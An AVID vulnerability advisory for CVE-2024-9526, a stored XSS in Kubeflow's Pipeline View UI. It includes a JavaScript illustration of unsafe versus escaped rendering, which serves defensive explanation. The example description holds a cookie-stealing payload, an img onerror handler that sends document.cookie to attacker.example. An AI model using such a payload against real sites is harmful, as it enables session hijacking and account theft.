AVID-2026-R1637
Description
Stored XSS in Kubeflow Pipeline View (CVE-2024-9526)
Details
There is a stored cross-site scripting (XSS) vulnerability in the Kubeflow Pipeline View web UI. The UI lets users create new pipelines, and a description can be supplied when doing so. The description field accepts HTML tags that are not properly neutralized before the description is rendered, so a crafted description is stored server-side and later executes as script in the browser of any user who views that pipeline. We recommend upgrading to a release that includes commit 930c35f1c543998e60e8d648ce93185c9b5dbe8d.
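The following is an added illustration of the bug class described above, not code from the Kubeflow Pipelines project and not the change made in the referenced commit. It contrasts rendering a stored description as raw markup with rendering it after HTML escaping, and includes a small check a reviewer or test can use to tell the two apart. The function names, the `pipeline-description` wrapper and the attacker-controlled description string are all constructed for this example.

```javascript
// Constructed attacker-supplied pipeline description, as it might be submitted
// through the "create pipeline" form and stored by the backend.
const maliciousDescription =
  'Training pipeline <img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Vulnerable pattern: the stored description is interpolated into the page as
// markup (the equivalent of innerHTML or React's dangerouslySetInnerHTML), so
// any tag it contains becomes live DOM and its event handler runs.
function renderDescriptionUnsafe(description) {
  return `<div class="pipeline-description">${description}</div>`;
}

// Hardened pattern: escape the characters that can open or close markup before
// the value reaches the page. React does this automatically for text children
// ({description}); the bug class only arises when that escaping is bypassed.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#39;',
  }[ch]));
}

function renderDescriptionSafe(description) {
  return `<div class="pipeline-description">${escapeHtml(description)}</div>`;
}

// Review/test helper: strip the known wrapper element and report whether any
// raw tag (a "<" followed by a letter or "/") survived from the user input.
// Escaped output contains "&lt;" instead of "<", so it passes; raw output fails.
function containsRawTag(rendered) {
  const inner = rendered
    .replace(/^<div class="pipeline-description">/, '')
    .replace(/<\/div>$/, '');
  return /<\/?[a-z]/i.test(inner);
}

console.log('unsafe :', renderDescriptionUnsafe(maliciousDescription));
console.log('safe   :', renderDescriptionSafe(maliciousDescription));
console.log('raw tag in unsafe output:', containsRawTag(renderDescriptionUnsafe(maliciousDescription)));
console.log('raw tag in safe output  :', containsRawTag(renderDescriptionSafe(maliciousDescription)));
```

Escaping is the simplest correct choice when the field is meant to hold plain text; if a deployment wants rich-text descriptions, an allow-list sanitizer is needed instead, and that is a design decision this entry does not settle. To confirm a checked-out Kubeflow Pipelines tree contains the fix, `git merge-base --is-ancestor 930c35f1c543998e60e8d648ce93185c9b5dbe8d HEAD` exits 0 when the commit is an ancestor of the current HEAD.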
Reason for inclusion in AVID: CVE-2024-9526 describes a stored XSS vulnerability in Kubeflow Pipeline View UI, a component used in ML pipelines to build/deploy AI workflows. This is a software vulnerability in a component that participates in the AI software stack, i.e., a general-purpose AI supply chain element. The report provides clear CVE details and references (NVD, GitHub PR), establishing the vulnerability signal.
References
Affected or Relevant Artifacts
- Developer: Kubeflow
- Deployer: Kubeflow
- Artifact Details:
| Type | Name |
|---|---|
| System | Kubeflow Pipeline View |
Impact
AVID Taxonomy Categorization
- Risk domains: Security
- SEP subcategories: S0100: Software Vulnerability
- Lifecycle stages: L06: Deployment
CWE
| ID | Description |
|---|---|
| CWE-79 | CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or ‘Cross-site Scripting’) |
Other information
- Report Type: Advisory
- Credits:
- Date Reported: 2024-11-18
- Version: 0.3.3
- AVID Entry